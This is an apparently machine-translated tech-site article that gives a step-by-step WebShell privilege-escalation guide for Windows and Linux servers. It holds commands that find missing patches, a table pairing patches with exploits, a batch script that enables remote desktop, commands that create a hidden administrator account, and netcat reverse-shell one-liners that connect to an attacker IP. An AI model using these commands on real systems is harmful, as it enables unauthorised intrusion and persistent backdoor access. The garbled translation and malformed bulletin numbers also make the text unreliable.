Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about the promotion of authority based on WebShell, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

I. Rights raising based on WebShell

1. Access Malaysia to view permissions

Http://192.168.1.147/dm.asp

2. If you refuse to access what you can upload an aspx Malaysia, this permission is relatively large.

Http://192.168.1.147/da.aspx

II. Window raises the right

1. Check the patching status of the system.

Win2003:

Systeminfo > C:Windows\ tmp\ temp.txt& (for% I in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @ type C:Windows\ tmp\ temp.txt | @ find / I "% I" | | @ echo% i Not Installed!) & del / f / Q / a C:Windows\ tmp\ temp.txt

General-purpose:

Systeminfo > C:Windows\ tmp\ temp.txt& (for% I in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @ type C:Windows\ tmp\ temp.txt | @ find / I "% I" | | @ echo% i Not Installed!) & del / f / Q / a C:WindowsTemptemp.txt

2. Patch comparison table, upload exe, and execute command

KB952004: MS09-012 PR

KB956572: MS09-012 Brazilian barbecue

KB2393802:MS11-011

KB2592799:MS11-0801

KB2621440:MS12-0203

KB2160329:MS10-048

KB970483: MS09-020 iis6 raises the right (possibly)

KB2124261,KB2271195 MS10-065IIS7 raises the right (possibly)

KB977165: MS10-015,

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB3077657 MS15_077 font lifting

KB944653 MS07-067

KB952004 MS09-012

KB971657 MS09-041

KB2620712 MS11-097

Kb942831 MS08-005

KB2503665 MS11-046

KB2592799 MS11-0801

3. Due to the vulnerability of PR rights promotion, upload a pr.exe execution.

4. Generally speaking, those directories have read and write permissions

Log, cache, Recycle Bin, Malaysia directory

5. Open 3389, command line

Create a new bat file, enter the following, and upload it to the appropriate directory

Echo Windows Registry Editor Version 5.00 > > 3389.reg

Echo [HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server] > > 3389.reg

Echo "fDenyTSConnections" = dword:00000000 > > 3389.reg

Echo [HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server\ Wds\ rdpwd\ Tds\ tcp] > 3389.reg

Echo "PortNumber" = dword:00000d3d > > 3389.reg

Echo [HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server\ WinStations\ RDP-Tcp] > 3389.reg

Echo "PortNumber" = dword:00000d3d > > 3389.reg

Regedit / s 3389.reg

Del 3389.reg

Command line execution

/ c c:\ aiyou\ pr.exe "c:\ aiyou\ 3389.bat"

2. Open port 3389 with tools

3. Create a user and add an administrator group

Net user abc 123 / add

Net localgroup administrators abc / add

III. Database weighting

XP_CMDSHELL enable method to create a new query

4. Rebound shell

1. Forward connection, actively connect to the server, and the server opens the corresponding port

2. reverse connection, the server actively connects to us, and we monitor a certain port

Minor attack: nc-lvvp 1234

Webshell: nc.exe-e cmd.exe 192.168.1.133 (small attack ip) 1234

3. Get permission

4. Linux system nc-e / bin/bash small attack ip 1234

After reading the above, do you have any further understanding of WebShell-based privilege escalation? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.